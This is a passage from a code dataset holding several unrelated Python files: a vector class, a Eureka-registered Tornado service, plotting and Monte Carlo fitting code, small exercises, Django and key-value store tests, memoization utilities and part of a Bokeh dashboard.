return(self.multiplica_escalar(escalar))\n\n def comprimento(self):\n \"\"\"Retorna o comprimento do vetor.\n \"\"\"\n return(sqrt(self.x**2 + self.y**2 + self.z**2))\n\n # cálculo do versor\n def normaliza(self):\n \"\"\"Retorna o versor do vetor self (um novo vetor, com a mesma\n direção do vetor self mas com comprimento igual a 1).\n \"\"\"\n fator = 1.0 / self.comprimento()\n return(self * fator)\n\n def interno(self, outro_vetor):\n \"\"\"Retorna o produto interno entre o vetor self e um outro vetor\"\"\"\n return(self.x * outro_vetor.x + self.y * outro_vetor.y \\\n + self.z * outro_vetor.z)\n\n def externo(self, outro_vetor):\n \"\"\"Retorna o produto externo entre o vetor self e um outro vetor\"\"\"\n\n x1 = self.x\n y1 = self.y\n z1 = self.z\n\n x2 = outro_vetor.x\n y2 = outro_vetor.y\n z2 = outro_vetor.z\n\n # ex ey ez\n # x1 y1 z1\n # x2 y2 z2\n\n x = y1 * z2 - z1 * y2\n y = -(x1 * z2 - z1 * x2)\n z = x1 * y2 - y1 * x2\n\n return(Vetor3D(x, y, z))\n\n\nif __name__ == \"__main__\":\n\n # teste ao construtor\n v1 = Vetor3D(1.0, 2.0, 3.0)\n\n # teste a get_x, get_y e get_z\n print(\"coordenada x de v1\")\n print(v1.get_x())\n print(\"coordenada y de v1\")\n print(v1.get_y())\n print(\"coordenada z de v1\")\n print(v1.get_z())\n\n # teste a __str__\n print(\"vetor v1 = \")\n print(v1)\n\n # teste a adiciona\n v2 = Vetor3D(4.0, 5.0, 6.0)\n print(\"vetor v2 = \")\n print(v2)\n v3 = v1.adiciona(v2)\n print(\"vetor v3 = \")\n print(v3)\n\n # teste a +\n v4 = v1 + v2\n print(\"vetor v4 = \")\n print(v4)\n\n # teste a multiplica_escalar\n escalar = 10.0\n v5 = v1.multiplica_escalar(escalar)\n print(\"vetor v5 = \")\n print(v5)\n\n # teste a *\n v6 = v1 * escalar\n print(\"vetor v6 = \")\n print(v6)\n\n # a linha seguinte dá erro de execução\n # porque a operação float * Vetor3D não está\n # definida na classe float\n # v7 = escalar * v6\n\n # teste a comprimento\n v8 = Vetor3D(0.0, 10.0, 0.0)\n print(\"comprimento de v8 = \")\n print(str(v8.comprimento()))\n print(\"comprimento de v1 = \")\n print(str(v1.comprimento()))\n\n # teste a normaliza\n v9 = v1.normaliza()\n print(\"v9 = versor de v1 =\")\n print(str(v9))\n print(\"norma de v9 =\")\n print(v9.comprimento())\n\n # teste a interno\n v10 = Vetor3D(1.0, 0.0, 0.0)\n v11 = Vetor3D(0.0, 1.0, 0.0)\n print(\"v10 interno de v11 = \")\n print(str(v10.interno(v11)))\n\n # teste a externo\n v12 = v1.externo(v2)\n print(\"v12 = v1 externo de v2 = \")\n print(str(v12))\n print(\"v12 interno com v1 = \")\n print(str(v12.interno(v1)))\n print(\"v12 interno com v2 = \")\n print(str(v12.interno(v2)))\n","sub_path":"projeto_33376/vetor_33376.py","file_name":"vetor_33376.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"259768547","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\nimport tornado.web\nfrom wasp_eureka import EurekaClient\nfrom tornado.options import define, options\n\ndefine(\"port\", default=7171, help=\"run on the given port\", type=int)\n\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.write('[GET] python tornado...')\n\n\n\n\n\nasync def main():\n result = await eureka.register()\n print(\"[Register Rureka] result: %s\" % result)\n\n tornado.options.parse_command_line()\n app = tornado.web.Application(\n handlers=[(r'/', IndexHandler)],\n debug=True\n )\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n\n while True:\n await 
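# A compact, English-named restatement of the cross product computed by
# Vetor3D.externo above, handy for checking the component formulas:
def cross(a, b):
    ax, ay, az = a
    bx, by, bz = b
    return (ay * bz - az * by,
            az * bx - ax * bz,
            ax * by - ay * bx)

print(cross((1.0, 0.0, 0.0), (0.0, 1.0, 0.0)))  # (0.0, 0.0, 1.0)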
asyncio.sleep(60)\n        await eureka.renew()\n\n\nif __name__ == \"__main__\":\n    loop = asyncio.get_event_loop()  # create the event loop\n    app_name = 'linjk-python-eureka-client'\n    ip = '192.168.1.109'\n    my_eureka_url = 'http://10.64.140.34:8761'\n    eureka = EurekaClient(app_name=app_name, port=options.port, ip_addr=ip,\n                          hostname=\"localhost\", eureka_url=my_eureka_url, loop=loop)\n\n    loop.run_until_complete(main())\n","sub_path":"eureka.py","file_name":"eureka.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"272270389","text":"# -*- coding: utf-8 -*-\nimport os\nimport argparse\nfrom matplotlib import pyplot as plt\n\nimport numpy as np\nimport glob\n\ndef plot(record, file_name=\"img.png\", sec_scale=\"mill\"):\n    fig = plt.figure()\n    if sec_scale == \"mill\":\n        scale = 1000.0\n        sec_unit = \"[ms]\"\n    elif sec_scale == \"micro\":\n        scale = 1e6\n        sec_unit = \"[micros]\"\n    else:\n        scale = 1.0\n        sec_unit = \"[s]\"\n\n    for data in record:\n        n = data[\"n\"]\n        mean = data[\"mean\"] * scale\n        median = data[\"median\"] * scale\n        std = data[\"std\"] * scale\n        label = data[\"label\"][0]\n        plt.plot(n, mean, label=label)\n        plt.fill_between(n, (mean-std), (mean+std), alpha=0.4)\n        print(label)\n        print(mean[-1])\n        print(\"###################\")\n\n    plt.legend()\n    plt.xlabel(\"nums of files\")\n    plt.ylabel(\"time\" + sec_unit)\n    fig.savefig(file_name)\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument(\"--sec_scale\", type=str, default=\"mill\")\n\n    args = parser.parse_args()\n    sec_scale = args.sec_scale\n\n    record = []\n    files = glob.glob(\"out/image_*.npz\")\n    for file in files:\n        print(file)\n        record.append(np.load(file))\n\n    plot(record, file_name=\"fig/image_graph.png\", sec_scale=sec_scale)\n    os.system(\"xdg-open fig/image_graph.png\")\n","sub_path":"plot_image.py","file_name":"plot_image.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"319228874","text":"from math import pi\nfrom decimal import Decimal\n\nfrom numpy import array, unique, std, log, isnan, nonzero\nfrom numpy.random import randn\n\nfrom src import Face\nfrom .ModelFitter import ModelFitter\n\n\nclass MonteCarloFitter(ModelFitter):\n    def __init__(self, image, dimensions=199, model=None, initial_face=None,\n                 estimating_parameters=None, iterating_parameters=None,\n                 steps=100, callback=None):\n        \"\"\"\n        Keyword arguments:\n        - estimating_parameters     Parameters to estimate.\n        - iterating_parameters      Parameters to integrate by\n                                    in addition to parameters to estimate.\n        \"\"\"\n        super(MonteCarloFitter, self).__init__(image, dimensions, model,\n                                               initial_face, callback)\n\n        assert len(estimating_parameters) > 0\n        if iterating_parameters is None:\n            iterating_parameters = list(range(dimensions))\n\n        self.__iterating_parameters = unique(\n            estimating_parameters + iterating_parameters)\n        self.__estimating_parameters = array(estimating_parameters)\n\n        self.__parameters = None\n        self.__differences = None\n        self.__image = image\n        self.__values = []\n        self.__steps = steps\n\n    def start(self):\n        self.__parameters = []\n        self.__differences = []\n\n        for parameter in range(self.__steps):\n            self.request_face(self.__generate_face_parameters(), parameter)\n\n    def receive_image(self, image, index=None):\n        indices = nonzero(image[:, -1])\n\n        difference = (self.__image - image[:, 
0])[indices].flatten()\n        variance = std(difference)**2\n\n        power = - (\n            self.__image.size\n            * ((difference**2).sum() / (2*variance)) / difference.size\n            - 0.5 * self.__image.size * log(2 * pi * variance)\n        )\n        if difference.size == 0 or variance == 0 or isnan(power):\n            # print('Zero Parameters:', self.__parameters[index])\n            self.request_face(self.__generate_face_parameters(), index)\n            return\n        self.__differences[index] = power\n        if None not in self.__differences:\n            self.__calculate_result()\n\n        # if self.__differences.count(None) % 1000 == 0 \\\\\n        #         and self.__differences.count(None) < len(self.__differences):\n        #     params = [p for d, p in zip(self.__differences,\n        #               self.__parameters) if d is not None]\n        #     tmp = [(d, p) for d, p in zip(\n        #         self.__get_probabilities(self.__differences), params)]\n        #     self.__get_iterations_count(tmp)\n\n    def __calculate_result(self):\n        \"\"\"Get weighted sum of achieved parameters.\n\n        Normalize probabilities as their sum should be 1.\n        Then get sum of parameters got during iterations\n        multiplied by corresponding probabilities.\n\n        Form parameters of final face and finish the fitting procedure.\n        \"\"\"\n        # log-sum-exp normalization: subtract max_difference as well, so that\n        # the exponentiated weights really sum to 1\n        max_difference = max(self.__differences)\n        normalized_differences = array(self.__differences) - max_difference - float(\n            sum(Decimal(diff - max_difference).exp()\n                for diff in self.__differences).ln())\n        params = [\n            sum(\n                Decimal(float(p[i]))*Decimal(diff).exp()\n                for diff, p in zip(normalized_differences, self.__parameters))\n            for i in self.__estimating_parameters]\n        parameters = self._initial_face.as_array\n        parameters[self.__estimating_parameters] = params\n        self.finish(Face.from_array(parameters))\n\n    def __get_iterations_count(self, values):\n        \"\"\"Estimate number of iterations.\n\n        Calculate how many iterations are needed with the current variance\n        to be 99% sure that the relative error is not greater than 0.01.\n        \"\"\"\n        average = sum(p * Decimal(float(v[0])) for p, v in values)\n        variance = (sum(p * (Decimal(float(v[0]))**2) for p, v in values)\n                    - average**2)\n\n        z = Decimal('2.575')**2\n        epsilon = Decimal('0.01')**2\n\n        return (z * variance / epsilon) / average\n\n    def __get_probabilities(self, differences):\n        \"\"\"Get normalized probabilities.\"\"\"\n        normalizator = sum(Decimal(d).exp()\n                           for d in differences if d is not None).ln()\n        return [(Decimal(d) - normalizator).exp()\n                for d in differences if d is not None]\n\n    def __generate_face_parameters(self):\n        \"\"\"Generate random face.\n\n        Based on needed parameters to iterate by and initial Face.\n        \"\"\"\n        parameters = self._initial_face.as_array\n        parameters[self.__iterating_parameters] = randn(\n            len(self.__iterating_parameters))\n        self.__parameters.append(parameters)\n        self.__differences.append(None)\n        self.__values.append(None)\n        return Face.from_array(parameters)\n","sub_path":"src/fitter/MonteCarloFitter.py","file_name":"MonteCarloFitter.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"11217499","text":"# future upgrade\n\n# use an enum in the new method instead of the if chain\n\nfrom random import randrange\n\nclass QA:\n\n\t@staticmethod\n\tdef new(rand_val=None):\n\n\t\tif rand_val is None:\n\t\t\trand_val = randrange(0,7)\n\n\t\tif rand_val == 0:\n\t\t\ta = randrange(4,60)\n\t\t\tquestion = \"question is {}/2\".format(a*2)\n\t\t\tanswer = a\n\t\telif rand_val == 1:\n\t\t\ta,b = (randrange(1,40),randrange(1,30))\n\t\t\tquestion = \"question is {} - {}\".format(a,b)\n\t\t\tanswer = a-b\n\t\telif rand_val == 2:\n\t\t\ta,b = randrange(2, 9),randrange(2, 
12)\n\t\t\tquestion = \"question is {} x {}\".format(a,b)\n\t\t\tanswer = a*b\n\t\telif rand_val == 3:\n\t\t\tif randrange(100) < 70:\n\t\t\t\tnumbers = [randrange(1, 17) for _ in range(randrange(2,6))]\n\t\t\t\tquestion = 'The question is: ' + ' + '.join(map(str, numbers))\n\t\t\t\tanswer = sum(numbers)\n\t\t\telse:\n\t\t\t\tnumbers = [randrange(1, 17) for _ in range(randrange(2,6))]\n\t\t\t\tquestion = 'The question is: ' + ' - '.join(map(str, numbers))\n\t\t\t\t# negate every term after the first so that answer = n0 - n1 - ... - nk\n\t\t\t\tnumbers = [numbers[idx]*-1 if idx>0 else numbers[idx] for idx,i in enumerate(numbers)]\n\t\t\t\tanswer = sum(numbers)\n\t\telif rand_val == 4:\n\t\t\ta = randrange(20,60) * randrange(25,55) * randrange(2,15)\n\t\t\tb = randrange(25,50) * randrange(15,65) * randrange(2,10)\n\t\t\tquestion = \"question is {} + {}\".format(a,b)\n\t\t\tanswer = a+b\n\t\telse:\n\t\t\ta,b = randrange(1,120), randrange(1,80)\n\t\t\tquestion = \"question is {} + {}\".format(a,b)\n\t\t\tanswer = a+b\n\t\treturn question,answer","sub_path":"que_ans.py","file_name":"que_ans.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"14119875","text":"from flask import Flask, g, current_app\nfrom config import Config\nfrom namex import db\n\n\ndef create_app(config=Config):\n    app = Flask(__name__)\n    app.config.from_object(config)\n    db.init_app(app)\n    app.app_context().push()\n    current_app.logger.debug('created the Flask App and pushed the App Context')\n\n    @app.teardown_appcontext\n    def shutdown_session(exception=None):\n        ''' Enable Flask to automatically remove database sessions at the\n        end of the request or when the application shuts down.\n        Ref: http://flask.pocoo.org/docs/patterns/sqlalchemy/\n        '''\n        current_app.logger.debug('Tearing down the Flask App and the App Context')\n        if hasattr(g, 'ora_conn'):\n            g.ora_conn.close()\n\n    return app\n","sub_path":"jobs/missing-coprs/nro/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"257964798","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport unittest, os, os.path, sys, shutil\nimport kvstorelocal\n\nclass KVStoreLocal_Test (unittest.TestCase):\n\tdef setUp (self):\n\t\tif os.path.exists (\"sandbox\"):\n\t\t\tshutil.rmtree (\"sandbox\")\n\t\tos.makedirs (\"sandbox/tmp\")\n\t\tself.store = kvstorelocal.KVStoreLocal (path=\"sandbox/tmp\")\n\n\tdef test_text (self):\n\t\tk = u\"this is a key string\"\n\t\tv = u\"this is value text\\nlet's goto the school.\\nfin.\"\n\t\tself.assertTrue (self.store.set_text (k, v))\n\t\tself.assertEqual (self.store.get_text (k), v)\n\n\tdef test_json (self):\n\t\tk = u\"this is a key string for json value\"\n\t\tv = {\n\t\t\t\"json\" : {\n\t\t\t\t\"users\" : [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\" : \"foo\",\n\t\t\t\t\t\t\"pass\" : \"1234\",\n\t\t\t\t\t\t\"age\" : 5,\n\t\t\t\t\t\t\"description\" : u\"foo is a bear.\"\n\t\t\t\t\t},\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\" : \"bar\",\n\t\t\t\t\t\t\"pass\" : \"\\\\12\\\\34\\\\56\\\\78\",\n\t\t\t\t\t\t\"age\" : 1,\n\t\t\t\t\t\t\"description\" : \"bar is a honey.\"\n\t\t\t\t\t}\n\t\t\t\t],\n\t\t\t\t\"departments\" : [\n\t\t\t\t\t{\n\t\t\t\t\t\t\"name\" : \"animals likes honey\",\n\t\t\t\t\t\t\"consist of\" : [\n\t\t\t\t\t\t\t\"foo\",\n\t\t\t\t\t\t\t\"bar\"\n\t\t\t\t\t\t]\n\t\t\t\t\t}\n\t\t\t\t]\n\t\t\t}\n\t\t}\n\t\tself.assertTrue (self.store.set_json (k, 
v))\n\t\tself.assertEqual (self.store.get_json (k), v)\n\n\tdef test_binary (self):\n\t\tk = u\"this is a key string for binary value\"\n\t\tv = b\"\"\n\t\tif sys.platform == \"win32\":\n\t\t\twith open (\"/windows/system32/notepad.exe\", \"rb\") as f:\n\t\t\t\tv = f.read ()\n\t\telse:\n\t\t\twith open (\"/bin/bash\", \"rb\") as f:\n\t\t\t\tv = f.read ()\n\t\tself.assertTrue (self.store.set_binary (k, v))\n\t\tself.assertEqual (self.store.get_binary (k), v)\n\nif __name__ == \"__main__\":\n\tunittest.main ()\n","sub_path":"tests/kvstorelocal_test.py","file_name":"kvstorelocal_test.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"437099411","text":"\"\"\"Numeric arrays\n\"\"\"\n\ndef add_inputed_elements(n):\n    \"\"\"Adds n elements inputed by user to T table and prints it\n\n    Args:\n        n - number of elements to be inputed\n    \"\"\"\n    T = []\n    while n!=0:\n        element = float(input(\"Enter a numeric value: \"))\n        T.append(element)\n        n -= 1\n    print(T)\n\n\ndef how_many_even_in_table(T):\n    \"\"\"Checks how many even numbers are in a table\n\n    Args:\n        T - a table of numbers\n    \"\"\"\n    n = len(T) - 1\n    p = 0\n    while n != -1:\n        # zero is even too, so test parity directly instead of truthiness\n        if T[n] % 2 == 0:\n            p += 1\n        n -=1\n    print(p)\n\n\ndef table_sum(T):\n    \"\"\"Calculates sum of elements of a table\n\n    Args:\n        T - Table of numbers\n    \"\"\"\n    n = len(T) - 1\n    suma = 0\n    while n != -1:\n        suma = suma + T[n]\n        n -= 1\n    print(suma)\n\n\ndef smallest_element(T):\n    \"\"\"Finds smallest element of the table\n\n    Args:\n        T - Table of numbers\n    \"\"\"\n    n = len(T) - 1\n    smallest_element = T[n]\n    while n != 0:\n        n -= 1\n        if smallest_element > T[n]:\n            smallest_element = T[n]\n    print(smallest_element)\n\n\ndef smallest_and_biggest_element(T):\n    \"\"\"Finds smallest and biggest elements of the table\n\n    Args:\n        T - Table of numbers\n    \"\"\"\n    n = len(T) - 1\n    smallest_element = T[n]\n    biggest_element = T[n]\n    while n != 0:\n        n -= 1\n        if smallest_element > T[n]:\n            smallest_element = T[n]\n        if biggest_element < T[n]:\n            biggest_element = T[n]\n\n    print(smallest_element)\n    print(biggest_element)\n\n\n\nif __name__ == '__main__':\n    smallest_and_biggest_element([321,2,3,1234])\n","sub_path":"programowanie_adam/Zestaw 6.py","file_name":"Zestaw 6.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
+{"seq_id":"198421193","text":"class BTNode(object):\n    def __init__(self, val):\n        self.val = val\n        self.left = None\n        self.right = None\n    \ndef build_bst_min_height(inlist):\n    \n    len_in = len(inlist)\n    \n    def _build(low, high):\n        if low > high:\n            return None\n        mid = low + (high-low)//2\n        \n        subroot = BTNode(inlist[mid])\n        subroot.left = _build(low, mid-1)\n        subroot.right = _build(mid+1, high)\n        \n        return subroot\n    \n    root = _build(0, len_in-1)\n    return root\n    \ndef print_inorder(root):\n    if not root: return\n    node = root\n    wstack = []\n    \n    while node or wstack:\n        if node:\n            wstack.append(node)\n            node = node.left\n        else:\n            node = wstack.pop()\n            print(node.val, end=\" \")\n            node = node.right\n    print(\"\")\n    \n\n\nif __name__ == '__main__':\n    inlist = [1, 3, 4, 5, 7, 8, 10, 12, 13, 15, 17]\n    \n    root = build_bst_min_height(inlist)\n    print_inorder(root)\n    \n","sub_path":"6 
Trees/6-09_build_bst_from_sortedarray.py","file_name":"6-09_build_bst_from_sortedarray.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"617873955","text":"import json\nfrom django.test import TestCase\n\nfrom ..models import Product, Size\n\n\nclass ProductModelTest(TestCase):\n \"\"\"\n Test model Product (CRUD and methods)\n \"\"\"\n @staticmethod\n def create_example():\n obj = Product.objects.create(\n name='Example',\n url='http://example.com',\n kid_adult='0',\n kids='0',\n women='0',\n free_porto='0',\n price=100.15,\n price_old=100,\n package='0',\n delivery='1 day',\n img_url='http://example.com'\n )\n size = Size.objects.create(\n value='EU 34'\n )\n obj.sizes.add(size)\n obj.save()\n return obj\n\n def test_create_instance(self):\n self.assertEqual(Product.objects.count(), 0)\n obj = self.create_example()\n self.assertEqual(Product.objects.count(), 1)\n self.assertEqual(Product.objects.first().name, obj.name)\n\n def test_edit_instance(self):\n obj = self.create_example()\n obj.name = \"Boots\"\n obj.save()\n self.assertEqual(Product.objects.first().name, \"Boots\")\n\n def test_delete_instance(self):\n obj = self.create_example()\n self.assertEqual(Product.objects.count(), 1)\n obj.delete()\n self.assertEqual(Product.objects.count(), 0)\n\n def test_get_json_method(self):\n obj = self.create_example()\n self.assertEqual(json.loads(obj.get_json())['name'], 'Example')\n\n def test_get_size_method(self):\n obj = self.create_example()\n self.assertIn('EU', obj.get_sizes())\n\n\nclass SizeModelTest(TestCase):\n \"\"\"\n Test model Size (CRUD and methods)\n \"\"\"\n @staticmethod\n def create_example():\n return Size.objects.create(\n value='EU 34'\n )\n\n def test_create_instance(self):\n self.assertEqual(Size.objects.count(), 0)\n obj = self.create_example()\n self.assertEqual(Size.objects.count(), 1)\n self.assertEqual(Size.objects.first().value, obj.value)\n\n def test_edit_instance(self):\n obj = self.create_example()\n obj.value = \"50\"\n obj.save()\n self.assertEqual(Size.objects.first().value, \"50\")\n\n def test_delete_instance(self):\n obj = self.create_example()\n self.assertEqual(Size.objects.count(), 1)\n obj.delete()\n self.assertEqual(Size.objects.count(), 0)\n","sub_path":"test_app/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619561934","text":"import hashlib\nimport os\nimport pickle\nimport struct\nfrom datetime import datetime\nfrom functools import reduce\nfrom typing import Callable\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.keras import Model\n\nfrom Configuration.Constants import Memoization\n\n\ndef external_hash(obj):\n if isinstance(obj,int):\n value = 0\n while obj != 0:\n value ^= int.from_bytes(hashlib.sha256((obj%65535).to_bytes(2, byteorder='big')).digest(),\"big\")\n obj //= 65535\n return value\n if isinstance(obj,float):\n return int.from_bytes(hashlib.sha256(bytearray(struct.pack(\"f\",obj))).digest(),\"big\")\n elif isinstance(obj,str):\n return int.from_bytes(hashlib.sha256(obj.encode('utf-8')).digest(),\"big\")\n elif isinstance(obj,dict):\n return external_hash(obj.items())\n elif type(obj) in [tuple,list]:\n if len(obj)==0: return 0\n return external_hash(reduce(lambda x,y : x^y,[external_hash(item) for item in obj]))\n elif isinstance(obj,Model):\n return 
external_hash([layer.weights for layer in obj.layers])\n        #return external_hash(reduce(lambda x,y : x^y,[layer.weights for layer in obj.layers]))\n    elif isinstance(obj,tf.Tensor):\n        return external_hash(obj.numpy())\n    elif isinstance(obj,np.ndarray):\n        if reduce(lambda x,y : x*y, obj.shape)>3e8:\n            print(reduce(lambda x,y : x*y, obj.shape))\n            # note that the slicing is a hack and may be prone to collisions - particularly so for sparse tensors\n            # you may want to eschew this conditional altogether\n            # The item amount at which it triggers (30.000.000) usually takes around 10s on an i9 10750H\n\n            # (this also assumes first-dimension slices are of a tractable size)\n            reduction_factor = reduce(lambda x,y : x*y, obj.shape)/3e8\n            first_dim_slice = np.floor(obj.shape[0]/reduction_factor).astype(int)\n            obj = obj[:first_dim_slice]\n        return external_hash(external_hash(obj.shape)^int.from_bytes(hashlib.sha256(obj.data.tobytes()).digest(),\"big\"))\n    elif isinstance(obj,Callable):\n        if obj.__name__ == \"<lambda>\":\n            raise Exception(\"external_hash cannot distinguish between anonymous functions\")\n        return external_hash(obj.__name__)\n    elif isinstance(obj,tf.python.ops.resource_variable_ops.ResourceVariable):\n        # hash a snapshot of the variable's contents; obj.value (unparenthesized)\n        # would hash only the bound method's name\n        return external_hash(obj.value())\n    else:\n        raise TypeError(\"Unimplemented external hash : {}\".format(type(obj)))\n\nMEMO_DIR = os.path.join(os.getcwd(),\"memos\")\nos.makedirs(MEMO_DIR, exist_ok=True)  # ensure the memo directory exists before it is listed\n\ndef permanent_memo(fun):\n    if Memoization.ENABLE_MEMOIZATION:\n        def memoed_fun(*args):\n            call_id = \"-\".join((fun.__name__,str(external_hash(args))))\n            if call_id in os.listdir(MEMO_DIR):\n                with open(os.path.join(MEMO_DIR,str(call_id)),\"rb\") as f:\n                    return_value = pickle.load(f)\n            else:\n                return_value = fun(*args)\n                with open(os.path.join(MEMO_DIR,str(call_id)),\"wb\") as f:\n                    pickle.dump(return_value,f)\n            return return_value\n        memoed_fun.__name__ = fun.__name__\n        return memoed_fun\n\n    else:\n        return fun\n\n\ndef timed(f):\n    f_name = f.__name__\n    def timed_f(*args, **kwargs):\n        execution_start = datetime.now()\n        return_value = f(*args,**kwargs)\n        execution_end = datetime.now()\n        print(\"Function {} ran for {}\".format(f_name,execution_end-execution_start))\n        return return_value\n    return timed_f\n\n\nclass SingleUseMethod:\n    \"\"\"\n    Used as a decorator. Ensures a method whose return value is unused (None) runs only once\n    (this could probably be implemented more briefly w/ closures, but would likely be hacky)\n    \"\"\"\n    def __init__(self,function):\n        self.function = function\n        self.__name__ = function.__name__\n        self.has_been_run = False\n    def __call__(self,*args,**kwargs):\n        if self.has_been_run: return None\n        self.has_been_run = True\n        self.function(*args,**kwargs)\n\n\ndef single_use_method(method):\n    \"\"\"\n    Used as a decorator. 
Ensures a None method is only executed once\n hack\n \"\"\"\n attribute_name = \"{}_has_been_run\".format(method.__name__)\n\n def single_use(self, *args, **kwargs):\n try:\n getattr(self, attribute_name)\n except AttributeError:\n setattr(self, attribute_name, True)\n method(self, *args, **kwargs)\n\n single_use.__name__ = \"single_use_{}\".format(method.__name__)\n return single_use\n\n\nif __name__==\"__main__\":\n from time import sleep\n\n @permanent_memo\n def hm(a, b):\n sleep(3)\n return a + b\n\n @permanent_memo\n def hmmmm(a, b):\n sleep(3)\n return a - b\n\n print(hm(7,4))\n print(hmmmm(7,4))\n","sub_path":"NeurIPSSoftware/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"24702381","text":"\"\"\"Loop through lines in column objects and trigger line operator class instances appropriately.\"\"\"\n\nimport xmlLineOperator\nimport xmlStaticOperators\n\nclass xmlColumnOperator(object):\n\n def __init__(self, index, dictionary, page, year, file_path, page_data, search_key_data):\n\n self.index = index\n self.dictionary = dictionary\n self.page = page\n self.year = year\n self.file_path = file_path\n\n self.page_data = page_data\n self.search_key_data = search_key_data\n self.page_break_dictionary_teilweise = self.list_operate()\n\n def list_operate(self):\n \"\"\"Plot words on page/figure.\"\"\"\n\n def write_from_list(file_path, list_name, delimiter):\n \"\"\"Write list element to newline-delimited .txt file.\"\"\"\n\n with open(file_path, 'a') as temporary_file:\n temporary_file = temporary_file.write(delimiter.join(list_name))\n\n page_break_dictionary_teilweise = {}\n dictionary_as_list = list(self.dictionary.items())[::-1]\n for i, word_list in enumerate(dictionary_as_list):\n present_line = xmlLineOperator.xmlLineOperator(self.index, dictionary_as_list[i],\n self.page_data, self.search_key_data, False)\n\n if present_line.company_name_found == 'Undefined' and i < (len(dictionary_as_list) - 1):\n next_line = xmlLineOperator.xmlLineOperator(self.index, dictionary_as_list[i+1],\n self.page_data, self.search_key_data, True)\n\n for word in next_line.captured_words:\n present_line.captured_words.append(word)\n\n if self.index in page_break_dictionary_teilweise.keys() and len(present_line.captured_words) > 0:\n page_break_dictionary_teilweise[self.index].update({max([word[1] for word in present_line.captured_words]): present_line.captured_words})\n\n elif len(present_line.captured_words) > 0:\n page_break_dictionary_teilweise.update({self.index: {max([word[1] for word in present_line.captured_words]): present_line.captured_words}})\n\n if len(present_line.captured_words) > 0:\n page = ['\\n', self.page, '\\n']\n words_to_save = present_line.captured_words[:]\n words_to_save.append('\\n')\n write_from_list(self.file_path, page, '')\n write_from_list(self.file_path, [word[0] for word in words_to_save], ' ')\n\n return page_break_dictionary_teilweise\n","sub_path":"text_dictionaries/xml_firm_search/codebase/xmlColumnOperator.py","file_name":"xmlColumnOperator.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"494449155","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 9 15:45:49 2021\n\n@author: yases\n\"\"\"\nfrom bokeh.models.widgets import Panel, Tabs\nfrom bokeh.models import ColumnDataSource, DataTable, TableColumn, Div, 
HTMLTemplateFormatter, DateRangeSlider, DateFormatter, CheckboxGroup, HoverTool, DaysTicker, RadioGroup\nfrom bokeh.layouts import column, gridplot, layout\nfrom bokeh.io import show, curdoc\nfrom bokeh.plotting import figure\nfrom bokeh.palettes import Category10_10\nimport datetime\nimport pandas as pd\n\ndef getmachinetab(df):\n\n machines = df['Machine'].unique() # for displaying radio button\n \n mx_dt = max(df.Start_Time.dt.date)\n mi_dt= min(df.Start_Time.dt.date)\n \n #color_coding\n factors_str = [\"Safety Stopped\", \"Starved\", \"Blocked\", \"Faulted\", \"Unallocated\", \"User Stopped\",\"Off\", \"Setup\",\"Running\", \"Runout\" ]\n color_dict = {}\n for x in Category10_10:\n cd = {factors_str[Category10_10.index(x)]:x}\n color_dict.update(cd)\n \n \n ##prepare line data\n def preparelinedata(df_subset):\n linedata = pd.DataFrame()\n statuses = df_subset.Status.unique()\n for status in statuses:\n d = df_subset.loc[df_subset['Status']==status]\n d['Start_Time'] = pd.to_datetime(d['Start_Time']).dt.to_period('D')\n d.set_index('Start_Time', inplace=True)\n idx = pd.period_range(min(df.Start_Time), max(df.Start_Time)).rename('Start_Time')\n d = d.reindex(idx, fill_value=0)\n d['Status'] = status\n d['Machine'] = 'Depal'\n d['Filler_Status'] = 'Blocked'\n d.reset_index(inplace=True)\n linedata = linedata.append(d, ignore_index=True)\n return linedata\n \n \n def make_lineplot(data):\n p = figure(plot_width=800, plot_height=400, x_axis_type=\"datetime\") \n statuses = data['Status'].unique()\n for status in statuses:\n d = data.loc[data['Status']==status]\n source = ColumnDataSource(d)\n p.line(x=\"Start_Time\", y=\"duration_sec\", line_width=2, source=source, color=color_dict.get(status), legend_label = status)\n \n p.legend.location = \"top_left\"\n p.legend.click_policy=\"hide\"\n \n hover = HoverTool()\n hover.tooltips = 